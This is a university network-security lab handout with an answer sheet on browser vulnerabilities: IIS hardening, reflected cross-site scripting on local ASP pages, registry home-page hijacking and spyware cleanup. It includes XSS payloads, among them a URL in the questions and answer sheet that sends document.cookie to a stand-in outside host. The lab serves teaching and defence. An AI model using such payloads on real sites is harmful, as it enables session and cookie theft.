ECE 4112: Internetwork Security
Lab 12: Internet Browsing Vulnerabilities and Security


Group Number: ___________

Member Names: _______________            _______________

Please read the entire lab and any extra materials carefully before starting. Be sure to
start early enough so that you will have time to complete the lab. Answer ALL questions
and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE
the Date Due.

Date:
Date Due:
Last Revised:

Written by: Beimnet Tadele, Andrew Larbi-Yeboa

NOTE: This document is an alteration of the document written by Ye Yan, Frank Park,
Scott Kim, and Neil Joshi.

Goal:       The goal of this lab is to examine common security vulnerabilities in browsing
the Internet and ways to reduce them.

Summary:             The first order of business is to install and configure Internet
Information Services (IIS), the Windows web server. It will be used to run a few ASP
pages that have vulnerabilities. These vulnerabilities will be tested and patched.
Furthermore, you will patch your browser and run various tools to protect it from
various exploits.

Background and Theory: In today's world, almost every network is connected to the
Internet, and the most common activity on the Internet is browsing web pages. Securing
one's browsing activity is therefore a logical step. However, as this lab will show,
browsing security is not a one-sided process the way some other areas of network
security are. Both the serving side and the client must take measures to ensure that their
exchange of information, whatever it may be, is secure and unexploited.

Prelab Questions:                None.




Lab Scenario:                For this lab, you are solely going to use your Win XP Pro
virtual machine. However, the lesson applies to both UNIX and Windows. We will install
IIS and run exploitable ASP pages. We will learn how the default configuration of
Internet Explorer makes us vulnerable to attacks through such pages. To avoid such
situations, we will configure IE 6.0 and learn good browsing habits. Finally, we will use
tools to clean spyware, clean and fix browsing-related registry problems, and write
scripts that run at startup and help clean cookies and temp folders.

Section 1: Installing and Securing IIS
For this lab, Windows XP and its native IIS were selected because of their ease of use
for the demonstrations in this lab. IIS can be installed on any PC running Windows
XP Pro. Although many services, such as FTP and SMTP servers, come with IIS,
we are only going to install the web serving features. Once installed, we are going to
install and run Microsoft Baseline Security Analyzer 1.2.1 (MBSA), which will help us
identify security holes in our IIS installation.

Procure a CD from your TA and proceed with the following steps.

Click on “Start”--->”Control Panel”--->”Add or remove programs”--->”Add/remove
Windows components.” Put a check mark on Internet Information Services (IIS). Click on
“Details” and uncheck SMTP and FTP. Click OK and NEXT. When prompted, insert the
WinXP Pro CD. When it finishes installing, click OK. You are now done installing IIS
and can use it as you wish. However, it is always a good habit to check for security
vulnerabilities in services you run. For this, copy the MBSA installation file from NAS and
install it. Copy html files.zip from NAS and unzip it to C:\Inetpub\wwwroot.

Now run MBSA and see what security hazards IIS poses at present. Click on Scan a
computer. Then uncheck every option except for “Check for IIS vulnerabilities.” (Note:
this runs only the IIS scan.) Submit a screen shot of the warnings you got. Once you
have the list of errors, correct them using the help guides listed. For file names, you can edit
the file names and change them as you wish. Once you finish correcting the errors, run
MBSA again and get a screen shot of the clean scan (Note: you will need iislockd.exe to
complete this section; you can find it on NAS).

Section 2: Cross-site scripting and Java Scripting
The majority of web browsing related headaches have some kind of script as their origin.
Some sites have malicious scripts in their pages that will infect you or exploit your system
when you view the page. Others have pages with security holes that black hats exploit
to attack your system. In this section, we are going to explore both kinds of
scripts and observe what we can do to avoid them.



Browsers generally execute scripts that are sent to them from the server as part of the
encoded HTML page. Usually, these scripts will be enclosed in a <script></script> tag. Once
this code gets loaded into your browser, it gets executed as long as the security settings
on the browser allow it. As an example, type in

http://localhost/insidescript.html

2.1. What did you see, and what does that imply?

The next type of script exploitation is commonly referred to as Cross-site scripting or XSS
(sometimes it is referred to as CSS, not to be confused with Cascading Style Sheets). In this
scenario a hacker exploits poorly written scripts to get access to personal
information from people accessing the script. The script might therefore be written and
used by a site that you trust and that has good intentions. However, the poor
quality of the code will leave both you and the site owner exploited.

The most common situation arises when a page requests a variable from the URL and
sends it back as part of the HTML code to the client's browser. An example of this could
be a search page where you put in a keyword, or some type of registration page where you
put in your personal information and your name or some other field gets displayed. Here
is an example of a URL supplying a page with the search keyword:

www.example.com/index.asp?keyword=find%20this

index.asp will then take the value of keyword and return it as part of the page to the
user's browser. Now, to execute JavaScript of his choosing, all a hacker would have to
do is replace the find%20this value of keyword with his JavaScript. An example of an
altered link would be:

www.example.com/index.asp?keyword=<script>SCRIPTCODE</script>

When the script part returns to the client's browser, it gets executed and does what the
black hat intended it to do. Now, let us proceed and see how an XSS could be
accomplished. Obtain login.asp, temp.asp and index.asp from NAS and place them in
C:\inetpub\wwwroot. Open each in sequence using Notepad and use the comments to
observe what the code does.

2.2 Explain briefly what the pages do and how they are related?

Fill out the login page and observe what happens. Now, click on the following link and
see what happens:

http://localhost/index.asp?name=<script>alert(document.cookie);</script>

2.3 What was the result and what do you think it means?




2.4 Consider the following link.
http://example.com/page.asp?variable=<script>document.location='http://www.mysite.com/cgi-bin/mailer.cgi?'+document.cookie</script>
What does this tell you in relation to cookie theft?

2.5 How would you prevent this exploit
       a. From the client’s side?
       b. From the host’s side?
Hint: the GET method on forms puts the information in the URL while the POST method
sends the information as a form member.
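The reflected parameter described above (index.asp echoing `keyword` back into the page) and the host-side part of question 2.5, shown as an added Node.js example. This is not code from the lab handout or its ASP pages; `htmlEncode`, `renderVulnerable`, `renderHardened` and the other names are this example's own, and the inputs are constructed from the handout's URLs.

```javascript
// Added example, not code from the lab handout: a Node.js model of the
// lab's index.asp search page. renderVulnerable() echoes the `keyword`
// parameter raw, as the handout describes; renderHardened() HTML-encodes
// it first. All function names here are this example's own.

// Replace the five characters that let text escape an HTML text node
// or attribute value. '&' must be encoded first or it would re-encode
// the entities produced by the later replacements.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Pull `keyword` out of the request URL the way the server would
// (URL.searchParams also undoes the %20-style percent-encoding).
function keywordFromUrl(url) {
  return new URL(url).searchParams.get('keyword') || '';
}

// Vulnerable page: the parameter lands in the HTML unchanged.
function renderVulnerable(keyword) {
  return '<html><body><p>Results for: ' + keyword + '</p></body></html>';
}

// Hardened page: the parameter is encoded at the point it is written out,
// so a "<script>" in the URL reaches the browser as literal text.
function renderHardened(keyword) {
  return '<html><body><p>Results for: ' + htmlEncode(keyword) + '</p></body></html>';
}

// Count real <script> start tags in a rendered page. The browser would run
// each one, so 0 is the only acceptable count for reflected user input.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed inputs: the benign URL from the handout, and the handout's
// cookie-alert payload placed in the same parameter.
const benignUrl = 'http://www.example.com/index.asp?keyword=find%20this';
const payloadUrl = 'http://www.example.com/index.asp?keyword='
  + encodeURIComponent('<script>alert(document.cookie);</script>');

// Render both pages for both inputs and report what the browser would get.
function demo() {
  const benign = keywordFromUrl(benignUrl);
  const payload = keywordFromUrl(payloadUrl);
  return {
    vulnerableScripts: countScriptTags(renderVulnerable(payload)), // 1
    hardenedScripts: countScriptTags(renderHardened(payload)),     // 0
    hardenedBenign: renderHardened(benign).includes('find this'),  // true
  };
}

console.log(demo());
```

The encoding step is what stops the payload, and it works the same whether the value arrived in the URL (GET) or in a form body (POST); switching the form method only hides the value from the address bar. On the client side, a cookie marked HttpOnly (supported since IE 6 SP1) is not visible to `document.cookie`, so even a script that does run cannot read it.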

As we have seen, some pages contain scripts that run when you browse that particular
page. It could be a page you found through a search engine, a page referred by a friend,
or one you saw in an ad; however you got there, you end up with JavaScript running in
your browser. This could hijack your browser, download a program (possibly a virus or
spyware), or send out information about you. To avoid such unwelcome situations, you
should always configure your browser to at least prompt you when a script is about to
run.

Start IE 6.0 and go to Tools--->Internet Options--->Security--->Local Intranet (Internet
for outside of the lab setting)--->Custom Level. Select Prompt for every entry that has the
words ActiveX, Script or Java in it. Click OK and then OK again. Once you are done with
this setting, re-click on the above link. You should get a prompt asking whether to let the
script run. Click NO. This prevents the script from running, and your cookie remains private.

           Figure 1. Security Settings for IE 6.0



Probably the other major security hazard concerning scripts is HTML-based e-mail and
JavaScript in e-mail. If you enable these features in your e-mail client, the alterations
demonstrated above could happen to your computer. Furthermore, since any Java
applet could be executed on your computer, severe damage could result.

How to disable JavaScript in e-mail programs:

For Outlook:

   1. Go to “Tools”--->“Options…” on the menu.
   2. Click the “Security” tab and select “Restricted sites” under the “Secure Content”
      area.
   3. Select “Zone Settings…”
   4. Select “Ok” when the warning GUI pops up.
   5. Select the “Custom Level…” button
   6. Under “Active Scripting” select “Disable”
   7. Select the “Ok” button

One of the classic examples of an exploit that used JavaScript was wire-tap. The above
steps will prevent such an exploit from running on your PC. Additionally, network activity
will now take place in the “Restricted” zone.

Section 3: Browsing hijacking and anti-hijacking
Have you ever had a problem where your browser home page changed by itself? Have
you ever had a problem where you typed in www.somesite.com, where 'somesite' is a site
of your choice, but you ended up on some shady or cheesy looking advertisement or
search page? Then you have experienced browser hijacking!! Yes, there are people out
there that literally abduct your browser. In the end, you don't have control of your own
browser. This obviously is very bad and could not be what you want out of Internet
surfing. So how is it done and how could we prevent it?

The first thing we will do is see how home page changing occurs while visiting a site
without the proper precautions. Note: this method is one of many ways that attackers alter
your home page. Proper security as shown in the previous section and proper use of tools
explained in section 4 should always be enforced to minimize damage.

Almost every program you run on your computer uses the Windows registry, even
though the majority of home computer users have never heard of it. The registry helps
programs remember user settings and user privileges, among other things. Altering this
information changes the way your programs behave.

For this exercise, you will need homepageeditor.html from NAS. Copy this file into
C:\inetpub\wwwroot. Once you are done copying, open the default registry editor: Start
---> Run ---> regedit. Navigate to “HKCU\Software\Microsoft\Internet Explorer\Main.”
Note the value of the “Start Page” key. Now close the editor and open the html file you
copied earlier in Notepad. Observe the code. The next step is to lower your
security setting in IE 6.0. Go to the security setting as before and reset the default
setting. Once you have the default, enable everything for scripts and ActiveX. Now fire
up IE 6.0 and type in http://localhost/homepageeditor.html. Once the page finishes
loading, open regedit as before and observe the change to your home page. Did it
change?

3.1 What does this demonstrate? And how could you avoid this?

3.2 Could you explain how the source code of the above script could be altered to change
the search page too?

The next type of hijacking is where your browser is taken for a “joy-ride” by its attackers
and the surfer is flooded with ad pop-ups. Usually spyware infects your computer and
makes the browser load ads from the ad servers. Another way this works is that the page
you are visiting allows the ad servers to load their ads into your browser. Either way,
your browser has to request a connection to the ad servers. When a connection to any
server is requested, what happens first is address look-up. Address look-up translates
the regular domain name that we know (e.g. www.google.com) into an IP address that
machines understand. This address look-up starts from the hosts file on your computer. If
a computer finds the address translation inside its hosts file, it stops looking and contacts
that server.

This hosts file, for XP machines, resides in the C:\WINDOWS\system32\drivers\etc folder.
Copy the text file 'fake_hosts.txt' from NAS and open it. This shows you fake address
translations for known ad servers. This way, even if you have spyware, or even if your
browser settings are altered somehow and it keeps calling these ad servers, you won't get
pop-ups from these ad servers. Select the entire text, copy it and paste it at the end of your
hosts file. This will prevent any ad from loading from these servers. The list is by no means
complete; however, a growing list can be found at http://spyware.surferbeware.com, the
original supplier of this list.

Section 4: Cleaning and keeping it safe
In this section, we are going to look at some tools and habits we should follow to keep
our Internet surfing safe. We are going to see four methods: maintaining the registry,
using up-to-date anti-spyware, cleaning your cookies, temp folders and cache, and
maintaining anonymity while surfing.

Section 4-1: Maintaining the registry

As we have seen in the previous section, the registry is like a backbone to your PC.
Furthermore, the health and integrity of the registry is necessary for the proper functioning
of your programs. Malicious programs, such as spyware, use the registry to persist on
your system. They use the registry to get started on boot-up, to get recreated
on deletion, and so on. This creates major havoc for your system. To avoid such cases,
and the other cases we have seen earlier, it is good practice to clean your registry and delete
any unwanted or erroneous entries. For this, we are going to use a program named
CleanMyPC. The trial version of this tool is available at:
http://www.tomdownload.com/utilities/system_utilities/computer_registry_cleanup.htm.
Follow these steps to install CleanMyPC.

   1. Copy the 15-day free trial of CleanMyPC from the NAS server to your Tools folder.
   2. Double-click and install the program.
   3. Create a backup of your registry as a precautionary measure.
   4. Click the “Startup Organizer”.
   5. If there are any unidentifiable executables in the registry, you will see them.
   6. Any malicious executables resident in your registry will be noticed and cleaned.

4.1 What kind of executable files did you see in the Startup Organizer?

Section 4-2: Cookies, temp folders and cache
Cookies are small text files that websites put on your PC (mostly with your permission)
to help them identify you the next time you visit. For example, when you sign in to
your e-mail account online (for example at yahoo.com), every page you visit on
yahoo remembers and displays your name by accessing the cookie left on your PC. Temp
folders are used to store temporary Internet files that help your browser speed up loading
pages and assist it in its other functions. The cache serves the same purpose. All these
browser features help in some way or another to make your browsing activity smoother
and better. However, these features could be used to infect your computer (leaving
spyware instead of cookies) or to obtain sensitive information. To avoid such
situations, you should always clean your cookies (those you don't need and don't recognize),
your temp folder and your cache. The next steps show you how to do this.

First search for a folder named Cookies and then Temporary Internet Files. You can use the
Windows search feature. Once you find these folders, open them and delete everything in
them.

4.2 What is the path of these folders? Was everything deleted in both of them?

Now open IE 6.0. Go to Tools--->Internet Options. You can click “Delete Cookies...”
and “Delete Files...”. These options clear out your cache.

Section 4-3: Beware of spy ware
One of the nauseating aspects of browsing is spyware. Spyware consists of programs that get
downloaded to your computer without your knowledge and send information about you
and your browsing habits back to their creators. These usually get downloaded together
with some programs that you download off the Internet. The other means by which they get
downloaded is through JavaScript while browsing a website with an unsafe browser.
Nowadays, even with all the safety procedures followed, being infected with a spyware
program or two is almost inevitable. Thus, it is generally good practice to regularly scan your
computer with anti-spyware software. For this, we suggest the Microsoft anti-spyware
software (only the beta version was out at the time of writing). It can be
downloaded at:

http://www.microsoft.com/athome/security/spyware/software/default.mspx


Section 4-4: Surfing the Internet anonymously

Every site you visit has the ability to collect personal information about you through your
unique IP address. Subsequently, they can also track your browsing activities and habits.
Knowledge of your IP address and operating system can allow hackers to penetrate your
system for malicious activities.

A new tool set named Tor has been developed for organizations to help improve safety
and secure browsing. This works by making your Internet browsing anonymous. Tor
can be downloaded from

http://tor.eff.org/download.html

The following four figures illustrate how Tor works. They were taken from the “master new
media” website:
http://www.masternewmedia.org/news/2005/04/15/anonymous_internet_browsing_can_increase.htm




The website claims that “Tor uses a network of 'virtual tunnels' which allows individuals
to keep remote websites from tracking them. They can also use it to connect to resources
such as news sites or Instant Messaging services that are blocked by their local Internet
service providers (ISPs).”

In addition to Tor, there is a clientless way of doing the same thing. However, this
requires you to log on to a certain website. www.megaproxy.com provides a free trial
of such a service.

4.3 Why do you think your IP is going to look different for the websites you visit
while using Tor?


What corrections and/or improvements do you suggest for this lab? Please be very
specific and if you add new material give the exact wording and instructions you
would give to future students in the new lab handout. You may cross out and edit
the text of the lab on previous pages to make corrections/suggestions. Note that part
of your lab grade is what improvements you make to this lab. You may want to
search the World Wide Web for other Buffer Overflow examples. What tools can we
add to this lab that teach something else new? You need to be very specific and
provide details. You need to actually do the suggested additions in the lab and
provide solutions to your suggested additions. Caution as usual: only extract and use
the tools you downloaded in the safe and approved environment of the network
security laboratory.




ECE 4112: Internetwork Security – Answer Sheet
Lab 12: Internet Browsing Vulnerabilities and Security


Group Number: ___________

Member Names: _______________       _______________



Section 2: Cross-site scripting and Java Scripting
2.1. What did you see, and what does that imply?



2.2 Explain briefly what the pages do and how they are related?




2.3 What was the result and what do you think it means?




2.4 Consider the following link.
http://example.com/page.asp?variable=<script>document.location='http://www.mysite.com/cgi-bin/mailer.cgi?'+document.cookie</script>
What does this tell you in relation to cookie theft?

2.5 How would you prevent this exploit
       a. From the client’s side?
       b. From the host’s side?
Hint: the GET method on forms puts the information in the URL while the POST method
sends the information as a form member.




Section 3: Browsing hijacking and anti-hijacking
3.1 What does this demonstrate? And how could you avoid this?




3.2 Could you explain how the source code of the above script could be altered to change
the search page too?




Section 4: Cleaning and keeping it safe
4.1 What kind of executable files did you see in the Startup Organizer?




4.2 What is the path of these folders? Was everything deleted in both of them?




4.3 Why do you think your IP is going to look different for the websites you visit
while using Tor?




What corrections and/or improvements do you suggest for this lab? Please be very
specific and if you add new material give the exact wording and instructions you
would give to future students in the new lab handout. You may cross out and edit
the text of the lab on previous pages to make corrections/suggestions. Note that part
of your lab grade is what improvements you make to this lab. You may want to
search the World Wide Web for other Buffer Overflow examples. What tools can we
add to this lab that teach something else new? You need to be very specific and
provide details. You need to actually do the suggested additions in the lab and
provide solutions to your suggested additions. Caution as usual: only extract and use
the tools you downloaded in the safe and approved environment of the network
security laboratory.





				